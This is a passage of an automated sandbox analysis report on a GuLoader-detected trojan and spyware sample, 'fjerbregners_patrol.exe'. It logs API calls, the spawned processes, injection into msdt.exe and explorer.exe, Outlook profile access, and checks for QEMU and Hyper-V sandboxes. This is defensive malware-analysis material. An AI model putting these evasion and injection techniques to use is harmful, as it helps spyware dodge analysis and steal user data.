        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D34260 NtSetContextThread,LdrInitializeThunk,2_2_33D34260
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D32BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_33D32BC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D32B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_33D32B90
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D32B10 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_33D32B10
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D329F0 NtReadFile,LdrInitializeThunk,2_2_33D329F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D32F00 NtCreateFile,LdrInitializeThunk,2_2_33D32F00
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D32EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_33D32EB0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D32E50 NtCreateSection,LdrInitializeThunk,2_2_33D32E50
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D32DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_33D32DC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D32DA0 NtReadVirtualMemory,LdrInitializeThunk,2_2_33D32DA0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D32D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_33D32D10
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D32CF0 NtDelayExecution,LdrInitializeThunk,2_2_33D32CF0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D32C30 NtMapViewOfSection,LdrInitializeThunk,2_2_33D32C30
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D33C90 NtOpenThread,2_2_33D33C90
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D33C30 NtOpenProcessToken,2_2_33D33C30
        Source: fjerbregners_patrol.exe, 00000002.00000003.3651257977.0000000033A93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs fjerbregners_patrol.exe
        Source: fjerbregners_patrol.exe, 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs fjerbregners_patrol.exe
        Source: fjerbregners_patrol.exe, 00000002.00000002.3795336805.0000000033F90000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs fjerbregners_patrol.exe
        Source: fjerbregners_patrol.exe, 00000002.00000003.3700565509.00000000000A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs fjerbregners_patrol.exe
        Source: fjerbregners_patrol.exe, 00000002.00000003.3657767457.0000000033C48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs fjerbregners_patrol.exe
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeSection loaded: edgegdi.dllJump to behavior
        Source: fjerbregners_patrol.exeVirustotal: Detection: 32%
        Source: fjerbregners_patrol.exeReversingLabs: Detection: 58%
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile read: C:\Users\user\Desktop\fjerbregners_patrol.exeJump to behavior
        Source: fjerbregners_patrol.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\fjerbregners_patrol.exe C:\Users\user\Desktop\fjerbregners_patrol.exe
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeProcess created: C:\Users\user\Desktop\fjerbregners_patrol.exe C:\Users\user\Desktop\fjerbregners_patrol.exe
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
        Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeProcess created: C:\Users\user\Desktop\fjerbregners_patrol.exe C:\Users\user\Desktop\fjerbregners_patrol.exeJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exeJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_0040360D EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,0_2_0040360D
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile created: C:\Users\user\AppData\Roaming\drvelensJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile created: C:\Users\user\AppData\Local\Temp\nsw84C0.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/8@12/11
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_00402300 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_00402300
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_00403FA8 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,EnableWindow,0_2_00403FA8
        Source: C:\Windows\SysWOW64\msdt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: fjerbregners_patrol.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: msdt.pdbGCTL source: fjerbregners_patrol.exe, 00000002.00000003.3700565509.00000000000A1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: fjerbregners_patrol.exe, 00000002.00000001.3579838555.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: fjerbregners_patrol.exe, 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3651257977.0000000033970000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3657767457.0000000033B1B000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.3747798612.0000000004DB2000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5564307473.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5564307473.000000000508D000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.3742536475.0000000004C04000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: fjerbregners_patrol.exe, fjerbregners_patrol.exe, 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3651257977.0000000033970000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3657767457.0000000033B1B000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.3747798612.0000000004DB2000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5564307473.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5564307473.000000000508D000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.3742536475.0000000004C04000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: fjerbregners_patrol.exe, 00000002.00000001.3579838555.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: msdt.pdb source: fjerbregners_patrol.exe, 00000002.00000003.3700565509.00000000000A1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: firefox.pdb source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.4519463189.00000000082C4000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.3673097625.000000000598E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CC1097 push esi; iretd 2_2_33CC10A2
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CC97A1 push es; iretd 2_2_33CC97A8
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CC21AD pushad ; retf 0004h2_2_33CC223F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CC017A push esi; iretd 2_2_33CC10A2
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_6EE82288 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6EE82288
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile created: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Tries to detect Any.run
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: fjerbregners_patrol.exe, 00000000.00000002.3670194938.0000000000528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXER0?
        Source: fjerbregners_patrol.exe, 00000000.00000002.3672501965.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3780737667.0000000003A90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: fjerbregners_patrol.exe, 00000000.00000002.3670194938.0000000000528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D31763 rdtsc 2_2_33D31763
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 899Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 858Jump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeAPI coverage: 1.5 %
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_004064FD GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004064FD
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_004063BD FindFirstFileA,FindClose,0_2_004063BD
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_004029DA FindFirstFileA,0_2_004029DA
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeAPI call chain: ExitProcess graph end nodegraph_0-4361
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: fjerbregners_patrol.exe, 00000000.00000002.3708078819.0000000006FD9000.00000004.00000800.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781933963.0000000005429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: fjerbregners_patrol.exe, 00000000.00000002.3708078819.0000000006FD9000.00000004.00000800.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781933963.0000000005429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
        Source: fjerbregners_patrol.exe, 00000000.00000002.3708078819.0000000006FD9000.00000004.00000800.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781933963.0000000005429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
        Source: fjerbregners_patrol.exe, 00000002.00000003.3655488166.0000000003B7F000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3780885221.0000000003B7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
        Source: fjerbregners_patrol.exe, 00000002.00000003.3655488166.0000000003B7F000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3780885221.0000000003B7F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5590270246.000000000CEC0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4273113348.000000000CEA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4938853327.000000000CEA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4946620557.000000000CEBF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpBinary or memory string: <li><a href="http://explorefreeresults.com/Best_Italy_Tours_for_Seniors_2023.cfm?domain=ladakhzesmo.com&fp=kXTqzi8r3yObxdW3h%2BgrP6mu1hUU9pjcjOcJod9ispghXmSjx7X9afCbUljKyyzVQSHPhGD5mmUw5keCukQomdDJqBLm7jFTez%2B7z8Aivgw4mj5iTAGZXRbKHWxmAa11GrhbKDqSPdOSpJPzZSadhsmKnO3gfBSpmnBvp3JL5rdh5Zky%2B3sWYm1BwJC8m%2Fq1nmjkPc6YPdvH7RN2wJ1KI9GYWqFztpnxi0R5hby4%2FVqkNnQCp1W1z0YxCt3QhUCiXGUM8mRNfTiO8g%2B8IaQuzuJG4SHWfh74VtXC3x0t%2Bym%2FBr7iLpvSKzVTRHgoPStx&yep=nQER3ifmRou6zzjCJLuWRsT1ctTb58MCwfahHhhaAYE868AXyZBZnHC%2BMqB47jeqg9zkzh9gkIQnZi3ZbzLw0ZUZd5qDV7AfO9xwPJ4jJmQemuYfE8hQHcOcFOhOQGoug6cJMr6j04EcPdu6%2F8Vytc4AN6dA%2FBG3PM20oWuIh%2BfjC8nVNy4%2ByTjrmcRDnuhwpMKhhBQL7Pclnemf8pgTULOze%2BqMz6qFhpf35Kae8rzt5seosif9bXt6p16%2BGyqlaoG%2F%2Fc0zR8IGXUVEysoyfC2gmZ4eWR4xOyTGnc9xf1Hem9cQGWwyDMS3KbaT5xQuwNytbNGwlqfPBBnQ%2F3J8wBvBP0TtmLeUfXurSyyApf%2BBx3JR1EUkQT3vGMY%2F8WffGSV9mb%2Bi8lsDSwjm7VjykkFs6osweZjgJgFhbvEQSnSTlqZaZLoOIOtEj65Gi7ZsPxXtnFq4pBtZlQ%2FwaiF3dxnty0qFlpObE8Y77WP9hW%2BaYw%2B9M%2B9Vw5yEwdYZ1ASBL1sxn%2FD4TzZx0dRW%2FlpmHR1KbCUFamyMPy02ksvL7o1HfO%2FVyho%2FPPVR85%2FdLbmhBhts7xCp9Sx7WMnfXRHlFT2UJ9lZZS%2FK4qVFlCvUKOdHiZk0zBl2hoAcJA9u3XBHwjm1OTG9WSGLKwdjbCeUOLcNachM45BqLCew%2FDFQfWFxZKstOU6dO0M0fBAc5EpywGLpLo2UmbLy43Tgfq1BxaCrqC4mPh21yHZNDf0o2zzf3C0oOH8Z7aMkjoaSDN1xQSSPFVi26pwM3EnjKDWZ%2Bwg6bmkzSircN0kf1zmqvjdNzZlrRPN5hVF8p8hPVZLQ%2FywHw6MqACw1QQE6HXvEuzI1sbQ5C9Do4UylTqVvnBAaEsR20Da0wnOwbQNnCI5uw%2FcbKQ1eH%2BL8YqtJnRFgXqtweKTIlXkcyFyNP62Ct288Ep%2FWHtr%2B9jehQI9OHKzkooloLR5wIgPbPNRedosxeKaqipHLWkZO2CqZ47wUZVdGmzKlpDCx1vqkUy9jRQcK1WgeoXTJqszXazTDS7PrkZeMecbs4xY9ZG22kPaNyQ8bK4JzFWrJviX7LZq9Jm56tkvinYq%2FV2q4HFgVkcy4TIjluXqBQR7OaXrhQDSOmjHLwhWNwChUSsZbwtLZAsZzOxrQGx9Rmj1j9ZJ%2BSiblIuGiL8BMAUitqWGZakTj%2Ffw1M0f9GM7ulv0xQX%2FUj96YBFUFUu3hJNXw6HBXlTo3zQ6ujOxZFCEQSCUk0TwvOVSOT2BtIGJ2GDzhVe%2B1gYil9edSkuaNY17srGqc5dHektOstDTCR7n948DZT83pBARS2DoZUvWvdfa4gItupQDmv%2BOn5uTftwxpXKHXUBovkfHlwNtQAbRUnMsW3NGRXdOdVBk65j3AamJibjVZAKO%2B4tyMAgXCrHcBfgIg2TTCMdbsqCn4DOngU4yAsp6O5aCtOEkeImKtnwrwTr7Dg4ddz%2FwpYpbuXsP2hXxurHM9cpYbBGYay7kV0rEFP5uSwNWi6PbM%2Fthh3uzwnDkfyv6F&gtnp=0&gtpp=0&kbetu=1&kld=1061&yprpnd=UHM6ofc%2BmzTMdphcWy%2Bzzw%3D%3D&_opnslfp=1&bkt=14894&d_bkt=14894&skpc=1&&gtnp=0&gtpp=0&kt=339&&kbc=ladakh+tours&ki=351380983&ktd=256&kld=1061&kp=3" target="_top" onmouseover="changeStatus('Best Italy Tours for Seniors 2023');return true;" onmouseout="changeStatus('');return true;" onclick="if(typeof(showPop) != 'undefined')showPop=0;return modifyKeywordClickURL(this, 'kwclk');;" title="Best Italy Tours for Seniors 2023" id="dk3" name="dk3" >Best Italy Tours for Seniors 2023</a></li>
        Source: msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <li><a href="http://explorefreeresults.com/Senior_Tours_USA.cfm?domain=ladakhzesmo.com&fp=kXTqzi8r3yObxdW3h%2BgrP6mu1hUU9pjcjOcJod9ispghXmSjx7X9afCbUljKyyzVQSHPhGD5mmUw5keCukQomdDJqBLm7jFTez%2B7z8Aivgw4mj5iTAGZXRbKHWxmAa11GrhbKDqSPdOSpJPzZSadhsmKnO3gfBSpmnBvp3JL5rdh5Zky%2B3sWYm1BwJC8m%2Fq1nmjkPc6YPdvH7RN2wJ1KI9GYWqFztpnxi0R5hby4%2FVqkNnQCp1W1z0YxCt3QhUCiXGUM8mRNfTiO8g%2B8IaQuzuJG4SHWfh74VtXC3x0t%2Bym%2FBr7iLpvSKzVTRHgoPStx&yep=nQER3ifmRou6zzjCJLuWRsT1ctTb58MCwfahHhhaAYE868AXyZBZnHC%2BMqB47jeqg9zkzh9gkIQnZi3ZbzLw0ZUZd5qDV7AfO9xwPJ4jJmQemuYfE8hQHcOcFOhOQGoug6cJMr6j04EcPdu6%2F8Vytc4AN6dA%2FBG3PM20oWuIh%2BfjC8nVNy4%2ByTjrmcRDnuhwpMKhhBQL7Pclnemf8pgTULOze%2BqMz6qFhpf35Kae8rzt5seosif9bXt6p16%2BGyqlaoG%2F%2Fc0zR8IGXUVEysoyfC2gmZ4eWR4xOyTGnc9xf1Hem9cQGWwyDMS3KbaT5xQuwNytbNGwlqfPBBnQ%2F3J8wBvBP0TtmLeUfXurSyyApf%2BBx3JR1EUkQT3vGMY%2F8WffGSV9mb%2Bi8lsDSwjm7VjykkFs6osweZjgJgFhbvEQSnSTlqZaZLoOIOtEj65Gi7ZsPxXtnFq4pBtZlQ%2FwaiF3dxnty0qFlpObE8Y77WP9hW%2BaYw%2B9M%2B9Vw5yEwdYZ1ASBL1sxn%2FD4TzZx0dRW%2FlpmHR1KbCUFamyMPy02ksvL7o1HfO%2FVyho%2FPPVR85%2FdLbmhBhts7xCp9Sx7WMnfXRHlFT2UJ9lZZS%2FK4qVFlCvUKOdHiZk0zBl2hoAcJA9u3XBHwjm1OTG9WSGLKwdjbCeUOLcNachM45BqLCew%2FDFQfWFxZKstOU6dO0M0fBAc5EpywGLpLo2UmbLy43Tgfq1BxaCrqC4mPh21yHZNDf0o2zzf3C0oOH8Z7aMkjoaSDN1xQSSPFVi26pwM3EnjKDWZ%2Bwg6bmkzSircN0kf1zmqvjdNzZlrRPN5hVF8p8hPVZLQ%2FywHw6MqACw1QQE6HXvEuzI1sbQ5C9Do4UylTqVvnBAaEsR20Da0wnOwbQNnCI5uw%2FcbKQ1eH%2BL8YqtJnRFgXqtweKTIlXkcyFyNP62Ct288Ep%2FWHtr%2B9jehQI9OHKzkooloLR5wIgPbPNRedosxeKaqipHLWkZO2CqZ47wUZVdGmzKlpDCx1vqkUy9jRQcK1WgeoXTJqszXazTDS7PrkZeMecbs4xY9ZG22kPaNyQ8bK4JzFWrJviX7LZq9Jm56tkvinYq%2FV2q4HFgVkcy4TIjluXqBQR7OaXrhQDSOmjHLwhWNwChUSsZbwtLZAsZzOxrQGx9Rmj1j9ZJ%2BSiblIuGiL8BMAUitqWGZakTj%2Ffw1M0f9GM7ulv0xQX%2FUj96YBFUFUu3hJNXw6HBXlTo3zQ6ujOxZFCEQSCUk0TwvOVSOT2BtIGJ2GDzhVe%2B1gYil9edSkuaNY17srGqc5dHektOstDTCR7n948DZT83pBARS2DoZUvWvdfa4gItupQDmv%2BOn5uTftwxpXKHXUBovkfHlwNtQAbRUnMsW3NGRXdOdVBk65j3AamJibjVZAKO%2B4tyMAgXCrHcBfgIg2TTCMdbsqCn4DOngU4yAsp6O5aCtOEkeImKtnwrwTr7Dg4ddz%2FwpYpbuXsP2hXxurHM9cpYbBGYay7kV0rEFP5uSwNWi6PbM%2Fthh3uzwnDkfyv6F&gtnp=0&gtpp=0&kbetu=1&kld=1061&yprpnd=UHM6ofc%2BmzTMdphcWy%2Bzzw%3D%3D&_opnslfp=1&bkt=14894&d_bkt=14894&skpc=1&&gtnp=0&gtpp=0&kt=339&&kbc=ladakh+tours&ki=351174017&ktd=256&kld=1061&kp=2" target="_top" onmouseover="changeStatus('Senior Tours USA');return true;" onmouseout="changeStatus('');return true;" onclick="if(typeof(showPop) != 'undefined')showPop=0;return modifyKeywordClickURL(this, 'kwclk');;" title="Senior Tours USA" id="dk2" name="dk2" >Senior Tours USA</a></li>
        Source: fjerbregners_patrol.exe, 00000002.00000002.3780885221.0000000003B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX?
        Source: fjerbregners_patrol.exe, 00000000.00000002.3708078819.0000000006FD9000.00000004.00000800.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781933963.0000000005429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
        Source: fjerbregners_patrol.exe, 00000000.00000002.3670194938.0000000000528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exer0?
        Source: fjerbregners_patrol.exe, 00000000.00000002.3670194938.0000000000528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: firefox.exe, 00000006.00000002.4573503981.000001E0D6636000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: fjerbregners_patrol.exe, 00000000.00000002.3708078819.0000000006FD9000.00000004.00000800.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781933963.0000000005429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
        Source: explorer.exe, 00000005.00000003.4938853327.000000000CBF7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4273113348.000000000CBF7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5587726838.000000000CBF7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn6PJ
        Source: fjerbregners_patrol.exe, 00000002.00000002.3781933963.0000000005429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
